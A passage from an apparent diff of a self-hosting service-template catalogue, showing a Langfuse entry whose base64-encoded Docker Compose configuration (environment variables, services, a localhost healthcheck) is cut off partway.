         "slogan": "Langfuse is an open-source LLM engineering platform that helps teams collaboratively debug, analyze, and iterate on their LLM applications.",
-        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfRlFETl9MQU5HRlVTRX0nCiAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAtICdFTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfTEFOR0ZVU0V9JwogIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogIC0gJ0NMSUNLSE9VU0VfTUlHUkFUSU9OX1VSTD1jbGlja2hvdXNlOi8vY2xpY2tob3VzZTo5MDAwJwogIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogIC0gJ0NMSUNLSE9VU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0NMSUNLSE9VU0V9JwogIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYOi1ldmVudHMvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TOi0xMDAwfScKICAtIFJFRElTX0hPU1Q9cmVkaXMKICAtIFJFRElTX1BPUlQ9NjM3OQogIC0gJ1JFRElTX0FVVEg9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAtICdORVhUQVVUSF9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9ORVhUQVVUSFNFQ1JFVH0nCiAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogIC0gJ0xBTkdGVVNFX0lOSVRfT1JHX0lEPSR7TEFOR0ZVU0VfSU5JVF9PUkdfSUQ6LW15LW9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRT0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FOi1NeSBQcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9MQU5HRlVTRX0nCnNlcnZpY2VzOgogIGxhbmdmdXNlOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZTozJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIDA6ICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAxOiAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgMjogJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogICAgICAzOiAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgNDogJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgNTogJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgICAgIDY6ICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgNzogJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIDg6ICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgICAgIDk6ICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgMTA6IENMSUNLSE9VU0VfQ0xVU1RFUl9FTkFCTEVEPWZhbHNlCiAgICAgIDExOiAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAxMjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDEzOiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAxNDogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAxNTogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDE2OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMTc6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMTg6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIDE5OiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjA6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIDIxOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDIyOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMjM6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAyNDogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAyNTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYOi1tZWRpYS99JwogICAgICAyNjogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgMjc6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAyODogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYOi1leHBvcnRzL30nCiAgICAgIDI5OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAzMDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIDMxOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UfScKICAgICAgMzI6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMzM6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAzNDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAzNTogJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIDM2OiAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIDM3OiBSRURJU19IT1NUPXJlZGlzCiAgICAgIDM4OiBSRURJU19QT1JUPTYzNzkKICAgICAgMzk6ICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIDQwOiAnRU1BSUxfRlJPTV9BRERSRVNTPSR7RU1BSUxfRlJPTV9BRERSRVNTOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDQxOiAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIDQyOiAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICA0MzogJ0FVVEhfRElTQUJMRV9TSUdOVVA9JHtBVVRIX0RJU0FCTEVfU0lHTlVQOi10cnVlfScKICAgICAgNDQ6ICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgNDU6ICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICA0NjogJ0xBTkdGVVNFX0lOSVRfT1JHX05BTUU9JHtMQU5HRlVTRV9JTklUX09SR19OQU1FOi1NeSBPcmd9JwogICAgICA0NzogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIDQ4OiAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIDQ5OiAnTEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMPSR7TEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDUwOiAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICA1MTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgICBTRVJWSUNFX0ZRRE5fTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9GUUROX0xBTkdGVVNFXzMwMDB9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3B1YmxpYy9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCiAgbGFuZ2Z1c2Utd29ya2VyOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZS13b3JrZXI6MycKICAgIGVudmlyb25tZW50OgogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgLSAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICAtICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIC0gUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICAtICdBVVRI